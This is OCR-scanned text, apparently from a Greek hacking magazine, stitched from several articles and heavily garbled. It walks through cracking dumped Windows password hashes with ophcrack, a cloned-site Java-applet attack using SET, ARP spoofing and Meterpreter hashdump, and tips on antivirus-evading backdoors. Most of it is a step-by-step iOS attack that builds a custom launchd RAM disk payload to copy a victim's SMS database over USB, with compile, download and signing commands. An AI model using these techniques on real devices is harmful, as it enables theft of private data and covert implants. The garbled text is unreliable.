(Προσοχή: To μέγεθος rou rainbow table εἶναι 700 περίπου megabyte.) 
Αποσυμπιέστε µε ro unzip το αρχείο tables xp free fast.zip µέσα о” 
ἑναν βολικὀ κατάλογο και τρέξτε ro ophcrack: 


root@bt:~# орһсгаск 


Στο GUI του προγράμματος, µε κλικ στο Tables εγκαταστήστε το XP free 
fast (αυτό εἶναι το ὀνομα του rainbow table που κατέβηκε μόλις). Μετά 
δώστε Load --> PWDUMP file και υποδεῖξτε στο πρὀγραμμα το αρχείο µε 
та hashes nou δημιουργήσατε anó την ἐξοδο rou hashdump. Με алло 
va κλικ στο Crack, αρχίζει η “αντιστροφή” των hashes. 


Δείτε τα screenshots απὀ τις δικὲς µας δοκιμὲς και διαβάστε τις αντἰστοι- 
χες περιγραφές. 
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Παρατηρώντας την ἐξοδο 
του ettercap βλέπουμε ὁτι то 
θύμα τσίµπησε στο δόλωμα 
και επισκέφτηκε TO http:// 
codebender.cc. Μόνο που αντί 
yia ro κανονικὀ site βρέθη- 
κε στο κλωνοποιημένο, που 
σερβίρει то SET! 


| eodebender [+ 
+ собе 


IER Pln 4 


enter the cloud. enter 


= 
code Ἢ 

Do you want to run this application? 
Time to revolut У Des Her is a platform 
that helps your нате: Јама cker or an artist, 
codebender all AN, Peblthen; UNKNOWN. me web editor. 
Host your Ardu From: —— Hfipij[eodebender cz and debug your 
Sketches from ! р. This applcaton vil run with restricted access which may put your computer and straight from your 


browser. No int personal information at risk, Run this application only if you trust the publisher. 


z 


Compile 


9 you the 
and updating 


you to write more viewable 
and find the. 


your sket 


reporting! 


View details » 


МЕ TO που φορτώνει η πρώτη O£AÍ- 63 


δα TOU http://codebender.cc στον = e 
browser rou θύματος, του ζητείται [eere = 

άδεια για την εκτέλεση ενός Java ОШ zew | 
applet. Αναλόγως rou πόσο кал) Go2800 91% κ 


боола ἐχει КАУЕ! ο κοινωνικός 
μηχανικός, ο φίλος µας да επιτρέ- 
ψει την εκτέλεση rou applet... 
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Περισσότερο ρεαλιστικὀ σενάριο 


Σε µια επίθεση εκτὸς εργαστηρἰου алла µε ἰδιο ἡ παρόμοιο επιθυμητὀ 
αποτέλεσμα, арк=та πράγματα θα ἦταν διαφορετικά. 


e Επιτιθέμενος kai θύμα δεν βρίσκονται στο 1010 LAN 


>’ αυτὸ το σενάριο то ARP spoofing δεν παίζει. Μπορούμε орос va 
φτιάξουμε ἑνα backdoor το onoio όταν εκτελείται θα προσπαθεί 
να συνδεθεί στο δημόσιο IP του router µας και, µε το απαραίτητο 
port forwarding, θα φτάνει т=Лка στον listener που τρέχει στο 
BackTrack box. Το θέμα εἶναι от! µε капою τρόπο το θύμα прё- 
πει να εκτελέσει το backdoor στον υπολογιστή του! Ki εδώ εἶναι 
που για ἄλλη µια фора δοκιμάζονται οι ικανὀτητὲς µας στο social 
engineering... 


e То θύμα трЕХЕ! (ikavó) antivirus 


To antivirus στον υπολογιστή rou θύματος δεν πρέπει va εντοπίσει 
το backdoor. Οι περισσότεροι AV vendors εἶναι πλέον σε θέση ν΄ 
αναγνωρίζουν επιτυχώς την πλειονότητα των backdoors nou δηµι- 
ουργεί το Metasploit. Υπάρχουν βέβαια τεχνικὲς για то «paokápe- 
ра» των backdoors, µε отохо φυσικἀ το проспёрасра του ὁποιου 
antivirus. Το θέµα εἶναι μεγἁλο κι εξαιρετικά ενδιαφἑρον. Σε ne- 
ρίπτωση που θελήσετε ν΄ ασχοληθεἰτε, ξεκινήστε апо το σχετικὀ 
άρθρο που έχουμε online: 


http://deltahacker.gr/?p-3026 
e То θύμα τρέχει Windows 7 


H λήψη rov password hashes δεν εἶναι τόσο απλἠ υπόθεση σε 
σχέση µε την περίπτωση των Windows ΧΡ, αφού πρέπει va ἐχε- 
τε δικαιώματα Administrator πριν γίνει το dump. Κατ’ =Лах!отом, 
οφεἰλετε να κάνετε migrate σε κἀποιο process του συστήματος µε 
τα ανάλογα δικαιώματα. Στο prompt του Meterpreter, δώστε help 
για να δείτε τις διαθἑσιµες εντολἑὲς και προσπαθήστε то. 


Προτείνουμε va nai&ere прота µε το σενάριο nou περιγράψαμε, αν µη 
τι ἄλλο για να εξοικειωθείτε µε τις σχετικὲς έννοιες και τα διαθέσιµα Ep- 
γαλεία. Αργότερα επαναλάβετε το σενάριο αλλά αυτή τη фора στη θέση 
των Windows ΧΡ βάλτε τα Windows 7. 


Anó κει και πέρα, µε τη βοήθεια κάποιου φίλου και κατόπιν συνεννοή- 
σεως, φυσικὰ, περάστε σε περισσότερο ρεαλιστικἀ σενάρια. Πώς va то 
κάνουμε, εἶναι ¿va πράγµα va επιτἰθεσαι о’ évav υπολογιστἠ (ἡ VM) στο 
ἰδιο δωμάτιο κι εντελὠς διαφορετικὀ να εἶσαι στο Ανατολικὀ Τιμόρ και va 
επιτἰθεσαι στην Καλαμαριά :) 


Καλή σας διασκέδαση! 
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Па ká8& Java applet που 
το υποψήφιο θύμα δὲ- 
χεται να εκτελέἑσει, ἑνα 
νέο κανάλι επικοινωνίας 
δημιουργείται μεταξύ 
του υπολογιστή TOU κι 
εκείνου rou attacker! 


Г rootbt: /pentest/expl... 


gP a [GIN 


Applications Places System (,28*C Wed Jul 11, 03:04 


У Х rootóbt: /pentest/exploits/set 
t View Terminal Tabs Help 


Ж |rootGbt: /pentest/exploits/set 


О attacker ἐχει ενεργοποιήσει 
£va session прос ro box тои 
θύματος ка! ue ТПУ εντολή 
hashdump тои Meterpreter 
μόλις ἐχει πάρει όλα ra 
hashes των χρηστών. 


Skill: Advanced 


Tags: 105 hacks, 
syscalls, watchdog 
timer, usbmux, RAM 
disk, redsnow 


Αυτή τη φορά δεν да µας σταματήσει rinora! 
Арк να αποκτήσουμε φυσικἠ πρὀσβαση στη 
συσκευήἠ iOS του θύματος, για µερικά λεπτά. 
Εάν έχουμε προετοιμαστεί κατάλληλα, θα 
μπορέσουμε va αντιγράψουµε οποιοδήποτε 
αρχείο ἡ ακόµη και να φυτέψουμε τον дико µας, 

κατασκοπευτικὀ κὠδικα! 
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Σε προηγούμενα ар@ра! εξετάσαµε διάφορες μεθόδους πρὀσβασης σε 
jailbroken iPhones και iPads, χωρίς εξουσιοδότηση. О επιτιθέμενος, xpn- 
σιμοποιώνταςτις αδυναμίες των "σπασμένων” συσκευών αποκτούσε πλή- 
pn πρόσβαση σε ευαἰσθητες πληροφορίες ὁπως SMS, emails, φωτογρα- 
φίες, επαφὲς, τελευταἰες κλήσεις και ὁ,τι ἄλλο пор! να βάλει ο νους 
μας! Στο παρὀν ар@ро θα παρουσιάσουμε τη µἐθοδο του hacker ονόματι 
NerveGas. Н μἐθοδὸς του εφαρμόζεται с’ όλες τις συσκευἑς iOS, avs- 
ξάρτητα апо την ἐκδοση ἡ την κατάσταση του λειτουργικού (jailbroken 
ἡ ὀχι) κι επιτρέπει την ανεµπὀδιστη εκτέλεση κὠδικα. Έτσι, μπορούμε va 
διεισδύσουµε στα ἄδυτα TOU iPhone, να κλέψουμµμε δεδομένα και να фитё- 
шоир апо Trojan horses μέχρι κατασκοπευτικἀ προγράμματα -- ανάλογα 
HE TIG ορέξεις µας. Στη συνέχεια θα δούμε δύο μεθόδους για την επίτευξη 
όλων αυτών. 


О εὐκολος τρόπος 


Όταν ο επιτιθἐµενος ἐχει άπλετο χρόνο, η εµφύτευση παράνομου κὠδι- 
κα επιτυγχάνεται πολύ εὐκολα. Με την προὐπόθεση от! το κλείδωμα της 
συσκευἠς µε PIN εἶναι απενεργοποιημένο ἡ ὁτι το PIN εἶναι γνωστό, o 
επιτιθέμενος µπορεί να κάνει μόνος του ἑνα jailbreak. Ως γνωστὸν, κάτι 
τέτοιο γίνεται άνετα µε οποιοδήποτε апо τα γνωστά εργαλεἰα (βλ., n.x., 
redsnOw) κι επιτρέπει στον επιτιθἐµενο να εισαγάγει κὠδικα, ὁπως eni- 
σης και va αυτοματοποιήσει την εκτἐλεσἠ rou (remote code execution, 
βλ. τεύχος 008). Στη συνέχεια, εγκαθιστώντας την εφαρµογή CyDelete 
ο επιτιθέμενος µπορεἰ να σβήσει το Cydia κι οτιδήποτε ἆλλο προδίδει 
TO jaibreak και кат’ επέκταση τις πράξεις του. Έτσι, η συσκευἠ θα εἶναι 
jailbroken, ο ιδιοκτήτης θα ἐχει πλήρη ἄγνοια κι ο κακόβουλος κὠδικας 
θα εκτελείται στο υπόβαθρο, τροφοδοτώντας rov επιτιθἐµενο µε πάσης 
φύσης πληροφορἰες. 


Ο δύσκολος τρόπος 


Όταν о χρόνος πιέζει τον επιτιθἐµενο --για την ακρίβεια órav έχει στη 
διἀθεσή του µερικἀ μόλις λεπτά-- τα πράγματα δυσκολεύουν. П’ αυτό то 
σενάριο θα υποθέσουμε Ori η συσκευἠ εἶναι κλειδωμένη µε PIN, το οποίο 
ο επιτιθἐµενος δεν γνωρίζει. Προφανώς, ο εισβολέας δεν ἐχει την άνεση 
να σβήσει εφαρμογές κι οτιδήποτε ἆλλο да πρὀδιδετις πράξεις rou. Н μὲ- 
θοδος επίθεσης nou θα εξετάσουμε εἶναι δύσκολη, αλλά βρίσκει *паута* 
εφαρμογή. Ακριβώς γι΄ αυτὀ µας αρέσει πολὺ περισσότερο апо εκεἰνη που 
αναφέραμε προηγουμένως. 


Н Apple εφαρμὀζει ёха εξαιρετικἁ πολύπλοκο σύστημα ασφάλειας στο 
λειτουργικὀ σύστημα των συσκευών της (http://images.apple.com/ipad/ 
business/docs/iOS Security May12.pdf). О NerveGas, λοιπὀν, &мас μάλ- 
λον ευφυἠς hacker, σκαρφίστηκε µια μέθοδο επίθεσης µε тп βοήθεια ενὸς 
RAM disk. О κὠδικας που αποθηκεύεται εκεἰ αναλαμβάνει την προσάρ- 
τηση των ἄλλων δίσκων της συσκευἠς και την εκκίνηση των υπολοίπων 
υπηρεσιών και προγραμμάτων. Με λίγα λόγια, ο κὠδικας του RAM disk 
ελέγχει ολόκληρη τη διαδικασία boot. Έτσι, ο επιτιθἐµενος δεν χρειάζε- 
ται να εγκαταστήσει καμία апо τις δημοφιλείς =фарноуёс yia jailbreak, 
οι οποίες θα φανέρωναν και τη δράση του. Αντίθετα, εισαγάγει κὠδικα о 
οποίος εκτελείται ката την εκκίνηση (boot) κι апокта τον πλήρη ἐλεγχο 
της συσκευής. Στη συνέχεια θα μελετήσουμε αναλυτικἀ τη σχετικἠ διαδι- 


1. Κινδυνεύει το iPhone; (τεύχος 009), Remote Code Execution στο iOS (τεύχος 008) ка! iOS εναντίον iOS 
(τευχος 005). 


All your iPhones are belong to us! 
| 


каста και θα δούµε ола τα ζητήματα nou προκύπτουν ката την &pappoyr| 
της. 


Σηµείωση. Πριν συνεχίσουμε κατεβάστε ro πακέτο iOSattack.zip, 
απὀ το http://bit.Ly/dhe10iattack. Περιλαμβάνει απαραίτητα αρχεία 
στα οποία θα αναφερόμαστε στη συνέχεια. Επίσης, επειδἠ да δουλέ- 
ФОЦИЕ σε περιβάλλον OS X, αν δεν ἐχετε υπολογιστή Mac τότε στήστε 
éva OS X Server based VirtualBox VM. Ενδεχομένως то napóv άρθρο 
va апатЕ! апо πολλή ἕως пара πολλή προπαρασκευαστικὴ δουλειά, 
το αποτέλεσµα ὀµμως ανταμείβει µε το παραπάνω! 


Н διαδικασία MacOS — redsnÜw — 172x54 


Л fi 1 bootlogo.png progresslogo.png redsnO0w 
Όπως ἔχουµε αναφερει σε npon- bootlogox2.png rd.tar 


γούμενα арӨра, ro launchd εἶναι 
TO πρῶτο πρόγραμμα nou εκτελεἰ- 
та! ката την εκκίνηση του iOS. Στη Please make sure your device is both OFF and PLUGGED IN to the 
μέθοδο επίθεσης του NerveGas cu v 

πρέπει va υποκαταστήσουμε TO а D Ie deos ud 
αυθεντικό launchd με μια δική μας "Slide to Power ОР appears, and then slide to power off. 
εκδοχἠ, η οποία θα просарта τους 
δίσκους της συσκευής και ακολού- ие 
θως да εκτελεἰ τον δικὀ µας κὠδικα 

(payload). Στο παράδειγµα που да 
δείξουμε o κακόβουλος κὠδικας θα 
μεταφέρει το αρχείο sms.db (npó- 
ката! για τη βάση δεδομένων µε 
та SMS του χρήστη) στον υπολο- 
γιστἠ µας, μέσω USB. Φυσικά, µε 
ελάχιστες αλλαγὲς στον κὠδικα 
θα μπορούσαμε να μεταφέρουμε 
οποιοδήποτε αρχείο ἡ φάκελο, ανε- 
ξαρτήτως μεγέθους. Όπως αντι- 
λαμβάνεστε ὁμως, το μέγεθος των 
δεδομένων nou “κλέβουμε” επηρε- 
ἀζει ἆμεσα τον χρόνο υλοποίησης 
της επίθεσης. Στην περίπτωση nou 
επιχειρούσαµε να μεταφέρουμε 
ολόκληρο τον κατάλογο /private 


8.0.0 redsnOw 0.9.10b5c 


Click next ONLY when your device is BOTH off and plugged in. 


И |. Cancel. 


(Ек=! βρίσκονται όλα ra προσωπικἁ δεδομένα rou χρήστη), ο χρόνος της Εικόνα 1. 
επίθεσης θα αυξανόταν ката 10 µε 15 λεπτά. Πριν ξεκινήσουμε την ava- Η δηµιουργία του 
λυτικἡ παρουσίαση, δείτε συνοπτικἁ τα βήματα της επἰθεσης: RAM disk στη 
συσκευή θα γίνει 

ο Προετοιμασία της δικἠς µας υλοποίησης των κλήσεων συστήματος αφού θέσουμε то 
(syscalls), για ενσωμάτωση oro RAM disk. iphone σε DFU 

mode kai =фар- 

e Απενεργοποΐηση rou watchdog timer, ὥστε о κὠδικας ToU RAM μοστεί ro exploit 
disk να εκτελείται ἄνετα για ὁση фра χρειαστεἰ (παραπάνω апо та του redsnOw. Στη 


συνέχεια θα εκτε- 
λεστεί ο κὠδικάς 
ο Ενεργοποίηση του πρωτοκόλλου USB µε τη βοήθεια δικού µας £p- μας... 
γαλείου, WOTE να διοχετεύσουµε τη δικτυακἠἡ рой δεδομένων апо 
το κινητὀ προς στον υπολογιστή µέσω USB. 


πέντε λεπτα που επιτρέπει η Apple). 


ο Ετοιμασία rou payload για τη συμπἱεση και την αντιγραφἠ ὀποιων 
αρχείων επιθυμούμε. To payload θα πρέπει να υπογραφεί µε то 
Idid, ὡστε va εκτελείται χωρίς προβλήματα. 
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e Ετοιμασία του δικού µας launchd, το οποίο θα προσαρτήσει τους 
δίσκους του συστήματος, θα αντιγράφει τα проураррата µας και 
θα τα εκτελεἰ. 


ο Δημιουργία RAM disk. 


Κλήσεις συστήµατος 


Οι κλήσεις συστήµατος (syscalls) παρέχουν πρόσβαση στις βασικὲς λει- 
τουργἱες ενὸς λειτουργικού. Οι βιβλιοθήκες της Apple µε τις κλήσεις 
συστήματος βρἰσκονται στο root filesystem. Επομένως, yia να γίνουν 
διαθέσιμες σε κἄποιο прӧүрарра 
θα πρέπει προηγουμένως va ἐχει 
προσαρτηθεί το εν λόγω σύστημα 
αρχείων. Με алла λόγια, ο κὠδι- 
κας nou θα τοποθετήσουμε στο 
ramdisk initlalLzed. ! RAM disk δεν θα έχει πρόσβαση 
searching for disk... σε αυτές. Αυτὸ σημαίνει от! прё- 
valting for /dev/disk8si to appear... πει να τις υποκαταστήσουμε µε 
µια δικἠ µας εκδοχἠ. О σχετικὀς 
κώδικας σε Assembly εἶναι στο 
αρχείο syscalls.S (εντὸς του пакё- 
του iOSattack.zip nou κατεβάσα- 
τε πριν λίγο). To syscalls.S πρέπει 
να μεταγλωττιστεἰ σε object file 
(syscalls.o) Χρησιμοποιώντας τον 
cross-compiler yia τη C. Να θυμί- 


gu ΕΤ üpen τι 4] 


Εικόνα 2. σουµε εδὠ ОТ! ο απαιτούμενος cross-compiler βρίσκεται στο περιβάλλον 
Όπως βλέπουμε, ανάπτυξης Xcode, το οποίο παρέχει η Apple δωρεὰάν:. Ὅσοι ἐχετε το Mac 
τμ OS X Lion μπορείτε να κατεβάσετε ro Xcode απευθεἰας απὀ то AppStore, 
ОЕ EVO οι χρήστες παλιότερων εκδόσεων του λειτουργικού πρέπει να ура- 
Хи rou launchd φτούν στο πρὀγραμμα Apple Developer. Μετά τη λήψη και την =уката- 
περιμένει την σταση του Xcode аркі να εντοπἰσουµε τον ζητούμενο compiler και να 
προσάρτηση των πληροφορηθούμε την ακριβή ἑκδοση του iPhone SDK που rov συνοδεύ- 
кататрпогоу TOU ει. Το прото επιτυγχάνεται µε ша απλἠ αναζήτησ ε τη βοήθεια του 
опара ο. ρ YX με H n ζήτηση, µε rn Вой 


ns-iMAC:Desktop drg$ locate arm-apple-darwin10-llvm-gcc-4.2 


Όσο yia τον ἐλεγχο του iPhone SDK, аркі να ρίξουμε µια ματιὰ στον 
ακόλουθο κατάλογο: 


/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS. 
platform/Developer/SDKs 


Με τα δεδοµένα nou θα συλλέξουμε апо αυτά τα δύο βήματα, πρέπει va 
ορίσουμε δύο μεταβλητές ως εξής: 


ns-iMAC:Desktop drg$ GCCFULLPATH-'/Applications/Xcode.app/ 
Contents/Developer/Platforms/iPhoneOS.platform/Developer/usr/ 
bin/arm-apple-darwin10-llvm-gcc-4.2' 


ns-iMAC:Desktop drg$ IPHONESDK-'/Applications/Xcode.app/ 
Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/ 
iPhoneOS5.1.sdk' 


Φυσικά, η θέση του μεταγλωττιστή ενδέχεται va διαφέρει στο дико σας 


2. Ἡ σχετικἠ διαδικασία παρουσιάστηκε αναλυτικά στο άρθρο «Remote code execution στο iPhone", ото 
τεύχος 009. 
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σύστημα, ὀπως επἰσης και η ἐκδοση rou iPhone SDK. Μετά ап’ αυτά 
μπορούμε (επιτἐλους) να µεταγλωττίσουμε τον κὠδικα µε τα δικἁ µας 
syscalls, ως εξής: 


ns-iMAC:Desktop drg$ $GCCFULLPATH -c syscalls.S -o syscall.o 


Απενεργοποίηση του watchdog timer 


Όταν ξεκινά то iOS ενεργοποιείται 
ταυτόχρονα µια δικλείδα ασφαλεἰ- 
ας µε то ὀνομα watchdog timer. 
Ουσιαστικἁ, δουλειά της εἶναι va 
μετρὰ το χρόνο εκτέλεσης opi- 
σμένων τμημάτων του λειτουργι- 
κοὐ συστήματος. Όταν παρέλθει 
κάποιο προκαθορισμένο χρονικὀ 
διάστημα o μετρητἠς θεωρεὶ Ori 
το σύστημα ἐχει κολλήσει και προ- 
καλεὶ µια επανεκκίνηση! О ou- 
γκεκριμένος μετρητής, µε το ἰδιο 
ακριβώς ὀνομα, περιλαμβάνεται σε 
пара πολλὲς πλατφόρμες”. Αν δεν 
απενεργοποιήσουμε τον watchdog 
timer, ο κώδικας στο RAM disk θα 


ramdisk initialized. 
searching for disk... 
waiting for /dev/disk8: 
[FTL :MSG1 ЕП _Ореп m πα 
mounting root filesystem... 
filesystem mounted. 
mounting devfs... 
devfs mounted 
checking root filesystem... 
κ. /dev/rdisküsi 
** Root file system 
Executing fsck hfs (version diskdev c 
nds-488.1.7-237). 
** Checking non-journaled HFS Plus Volum 
e. 
** Detected a case-sensitive volume. 
** Checking extents overflow file. 
Checking catalog file. 


πα 
** Checking nulti-Linked files. 
πα. 


ἐχει μόλις πέντε λεπτὰ yia να Ολο- 
Checking catalog hierarchy. 


κληρώσει τις εργασἰες του. AUTÒ 
σημαίνει ὁτι αν προσπαθήσουμε va 


αντιγράψουµε ёха μεγάλο πακέτο, кат! που θα εισήγαγε μεγάλη καθυ- Εικόνα 3. 
στέρηση kai πέραν rou πεντάλεπτου, ο watchdog timer θα θεωρήσει от! Οι ἐλεγχοι συνε- 
το boot απέτυχε και η συσκευἠ θα κάνει reset! Όπως αντιλαμβάνεστε, χίζονται ἕως ότου 
λοιπόν, εἶναι avaykaio va συμπεριλάβουµε στο RAM disk ¿va πρόγραµµα ra filesystems 
το οποίο θα απενεργοποιεἰ το μετρητἠ. О охЕТКОС κὠδικας βρίσκεται ο... 
στο αρχείο watchdog.c. Па τη µεταγλὠττισή του θα χρησιμοποιήσουμε προσαρτηµένα και 
και πάλι τον ἴδιο cross compiler. Αυτή τη φορά ωστόσο да χρειαστεί να προσβάσιμα... 


δηλώσουμε uia ακόµα μεταβλητὴἠ, µε το framework που περιλαμβάνει то 
σὐστημά µας. Στην περίπτωση του MAC OS X Lion (10.6), аркєі va δώ- 
coupe τα ακόλουθα: 


ns-iMAC:Desktop drg$ OSX-'/Developer/SDKs/MacOSX10.6.sdk/System/ 
Library/Frameworks' 


ns-iMAC:Desktop drg$ $GCCFULLPATH -c watchdog.c -o watchdog.o 
-isysroot ΦΙΡΗΟΝΕΣΡΚ -F$0SX 


Ενεργοποίηση της σύνδεσης USB 


Н επικοινωνἱα rou iTunes р TIG συσκευές που τρέχουν iOS πραγµατοποι- 
та! µέσω του usbmux. О εν λόγω μηχανισμὸς επιτρέπει τη διοχέτευση 
ТСР sockets µέσα апо µια USB σύνδεση (ТСР socket tunneling over USB). 
Ἔτσι, όταν το iTunes επικοινωνεί µε µια συσκευἠ σαν ro iPhone, συνδἑε- 
ται σε éva listening ТСР socket µέσω USB. Ката συνέπεια, όλες οι υπηρε- 
σίες νομίζουν Ori η επικοινωνἰα πραγματοποιείται δικτυακἁ (µέσω ТСР). 


Το usbmux ενεργοποιείται κι απενεργοποιεἰται αυτόματα anó το iOS. 
Ωστόσο, η λειτουργικὀτητἁ του απαιτείται κι апо τον δικὀ µας κὠδι- 
κα, yia τη μεταφορά των κλεμμένων αρχείων. Ἔτσι, oro RAM disk θα 


3. Μέχρι και το Arduino διαθέτει watchdog timer, αν και εἶναι εξ ορισμού απενεργοποιηµένος. 
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πρέπει va συμπεριλάβουμε ἑνα πρὀγραμμα, το οποίο θα ενεργοποι- 
εἰ αυθαίρετα ro σχετικὀ μηχανισμὀ. О απαραίτητος κώδικας εἶναι στο 
usbmux.c. Па τη µεταγλὠττισή του апатята! καὶ το πρότυπο αρχείο 
IOUSBDeviceControllerLib.h. Αυτά τα δύο αρχεία πρέπει να τοποθετη- 
θούν στον ἰδιο κατάλογο και για τη μεταγλώττιση apkei να γράψουμε 
кат! τέτοιο: 


ns-iMAC:Desktop drg$ $GCCFULLPATH -c usbmux.c -o usbmux.o 
-isysroot $IPHONESDK -Е$0$Х 


Payload code 


Τα προγράμματα nou ἐχουμε ετοιμάσει ως тора παρέχουν πρόσβαση 
σε ορισμένες βασικὲς λειτουργίες του συστήματος, απενεργοποιούν то 
watchdog timer κι ενεργοποιούν то usbmux, για τη δικτυακἠ επικοινωνία 
μέσω USB. Αυτὀ που μένει εἶναι να ετοιμάσουμε το ἰδιο το payload. О 
κὠδικας σε auró το πρόγραμμα θα αξιοποιεὶ τις λειτουργίες που npo- 
σφέρουν ола τα υπόλοιπα προγράµµατα, για να στείλει στον υπολογιστή 
μας το πακέτο µε ra SMS. О κὠδικας yia то payload εἶναι στο αρχείο 
payload.c. Па τη μεταγλώττιση θα χρειαστούμε για μία ακόµα фора rov 
cross-compiler και σχεδὸν ὀλες τις μεταβλητές nou ἐχουμε ορἰσει ως 
тора. Επιπρόσθετα, στον κατάλογο µε τον κὠδικα του payload πρέπει να 
τοποθετήσουµε ra watchdog.o και usbmux.o. Τελικά, αρκεἰ να δώσουμε 
кат! τέτοιο: 


ns-iMAC:Desktop drg$ $GCCFULLPATH -o payload payload.c 
watchdog.o usbmux.o -isysroot $IPHONESDK -framework IOKit -I. - 
framework CoreFoundation 


Πριν συνεχίσουμε, οφείλουμε va εξασφαλίσουµε от! то payload да EKTE- 
λείται στη συσκευἠ κανονικἀ. Па va συμβεἰ κἀτι τέτοιο, το πρὀγραμμά 
μας πρέπει να διαθέτει µια ειδικἠ ψηφιακή υπογραφή. Н προσθήκη αυτής 
της υπογραφἠς γίνεται ue то проуранра 1414. Па την εγκατάσταση του εν 
λόγω εργαλείου αρκεί να εκτελέσουµε ra ακὀλουθα: 


ns-iMAC:Desktop drg$ sudo mkdir /opt/theos 
ns-iMAC:Desktop drg$ export THEOS-/opt/theos 


ns-iMAC:Desktop drg$ sudo svn co http://svn.howett.net/svn/ 
theos/trunk $THEOS 


ns-iMAC:Desktop ἀγρῷ cd /opt/theos/ 
ns-iMAC:theos drg$ sudo wget http://bit.ly/dh008rcesig -O ldid 
ns-iMAC:theos drg$ sudo chmod «x ldid 

Στη συνέχεια, yia την υπογραφή rou payload δίνουμε κάτι τἐτοιο: 
ns-iMAC:Desktop drg$ 1414 -S payload 


Εκκίνηση µε ro launchd 


To launchd αποτελεἰ τον δαίμονα o οποίος ξεκινά αυτόματα διάφορες 
υπηρεσίες rou συστήματος και =фарноуёс, σε προκαθορισμένες хромкёс 
στιγμὲς ἡ σε такта διαστήματα. О 19106 δαίμονας ката την εκκίνηση rou 
συστήματος παἱζει опнаутико ρόλο, αφού οργανώνει τη σειρά εκτέλεσης 
όλων των βασικὠν υπηρεσιών του συστήματος. Па να πετύχουμε TO OKO- 
nó µας, στο RAM disk nou θα δημιουργήσουμε θα συμπεριλάβουμε µια 
“ειδική” ἐκδοση του launchd. Αυτή η ἐκδοση θα προσαρτά τα διαθέσιµα 
filesystems της συσκευἠς (σε аита βρἰσκεται το λειτουργικὀ σύστημα 
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αλλά και ra δεδομένα του χρήστη), 
θα φροντίζει για την εκτέλεση του 
payload, да апопросарта то RAM 
disk και θα κάνει επανεκκίνηση. Με 
λίγα λόγια, η δικἠ µας εκδοχἠ του 
launchd προκειµένου va ολοκλη- 
ρώσει την επίθεση θα στηρἰζεται 
σε ὁσα έχουμε φτιάξει ως ropa! О 
σχετικὀὸς κὠδικας εἶναι στο αρχεἰο 


launchd.c. 


Πριν προχωρήσουμε, πρέπει να 
σταθούμε σε µια σηµαντικἠ Às- 
πτομέρεια: О δικός µας κὠδικας 
για то launchd.c εἶναι γραμμένος 
για то 1054. Σε αυτή την ἐκδοση 


AppleSynopsys0TGDevice: 
nction Register function Usona seara 


ng 
init_waste 
ice: :gated registerFu 
LeUSBHux 


fippLeSynopsysOTGDev. 
nction Register function ррі 


ice: :gated isterFu 
nction Register function PTP aii 

ice: :gated registerFu 
nction all functions registered- we are 
ready to start usb stack 


: i:powerlp : powered: 
RippLeEnbeddedUSBRrbi trator : :enabLeDevice 
Clock : enable: 1, index: 8 
usbmux initial ized 

now Listening on ТСР:7. 


, β TGDevice: :handLeliSBReset 
TOU iOS, η κατάτμηση µε τα αρχεία 


TOU συστήµατος ἐχει TO ὀνομα / 
аеу/гаіѕк051, ενώ η κατάτμηση Е 
µε τα αρχεία του χρήστη &х= то ὀνομα /dev/rdiskO0s2s1. Ωστόσο, στο ολλ s 
1055 οι εν λόγω κατατμήσεις ¿xouv τα ονόματα /dev/rdisk0si1s1 και /dev/ Pu pda μόνην. 
гаі5к05152 αντίστοιχα. Τέλος, στο 1053 οι συγκεκριμένες κατατμήσεις τουργεί kavovi- 
ονομάζονται /dev/rdiskOs1 και /dev/rdisk0s2. Επομένως, ανάλογα µε την ка. Άνοιξε έναν 
ἐκδοση rou iOS στην οποἰα σκοπεύετε va επιτεθεῖτε, πρέπει να тропопо!- listener στη θύρα 
ἠσετε κατάλληλα τον κὠδικα του launchd ὥστε va χρησιμοποιεὶ τα σωστά 7 ка! περιμένει 
ονόματα κατατμήσεων. 


συνδέσεις ТСР. 


se Е ш | | 


VORITE Name Date Modified Size Kind 

E All My Files F bn.tar.gz 6/7/09 535 KB gzip c...rchive 
E $ bootlogo.png 21/8/08 8 КВ Portab...image 
“κ᾽ AirDrop 1| bootlogox2.png 31/10/10 S2KB Portab..image 
=] Desktop F Cydia.tar.gz 26/12/11 7 MB gzip c...rchive 
{$ drg D Datahack.dmg 5/7/12 2,1 MB Disk Image 

ΕΙ Keys.plist 18/12/11 815 KB Property List 
Ш progresslogo.png 6/7/09 50 KB Portab...image 
Г Documents P галаг 29/1/12 13,3 МВ tar archive 
ΓΙ Dropbox ΒΗ redsnow 12/2/12 5,3MB Unix E...le File 


)EVICES eoo MacOS — iproxy — 71x26 
E ns-iMAC ns-iMAC:MacOS drg$ 13 

Cydia.tar.gz bootlogox2.png 
Datahack.dmg progresslogo.png 
Keys.plist rd.tar 

bn.tar.gz теазп0м 

bootlogo.png 

ns-iMAC:MacOS drg$ iproxy 7777 7 

waiting for connection 


y Applications 
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Έχουμε ανοίξει 
τρία τερματικά: 
Στο Éva τρέχουμε 
το iproxy, yia va 
κάνουμε то ТСР 
tunneling µέσω 
USB, στο алло 
εκτελούμε TO 
netcat, yia va ξεκι- 
νήσει τη λειτουργία 
του то payload, 
ενώ στο τρίτο 
φαίνεται η χρήση 
του redsnOw, yia 
τη δηµιουργία του 
RAM disk στη συ- 
σκευή-στόχο.. 
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Πα va μεταγλωττίσουμε τον κὠδικα του launchd θα χρειαστούμε то 
syscall.o. Αφού τοποθετήσουµε τα δύο αρχεία στον 1610 κατάλογο, pno- 
ρούμε να δώσουμε τα ακόλουθα: 


ns-iMAC:Desktop drg$ 
ns-iMAC:Desktop drg$ 


Τέλος, θα πρέπει va υπογράψουμε ro launcd, ὁπως κάναμε και στην NE- 
ρίπτωση rou payload: 


ns-iMAC:Desktop drg$ 


Κατασκευἠ RAM disk 


Н κατασκευἠ του πραγματικού RAM disk στη συσκευἠ θα γίνει apyó- 
тєра. Πα την opa πρέπει να δημιουργήσουμε ёха disk image file µε та 
περιεχόμενα του RAM disk. Па то σκοπὀ αυτό, арҳіка χρησιμοποιούμε то 
εργαλείο hdiutil, апо τη γραµµή εντολὠν του МАС OSX. Εκεί, аркі να 
δώσουμε кат! τέτοιο: 


ns-iMAC:Desktop drg$ 


Μετὰ anó λίγα δευτερὀλεπτα θα δημιουργηθεί va image file των 5MB, 
НЕ σύστημα αρχείων το journaled HFS+. Τότε, το проуранна hdiutil θα 
εμφανίσει το ακόλουθο μήνυμα: 


created: /Users/drg/Desktop/Datahack.dmg 


Στη συνέχεια πρέπει va προσαρτήσουµε то v£o αρχεἰο εικόνας, ώστε va 
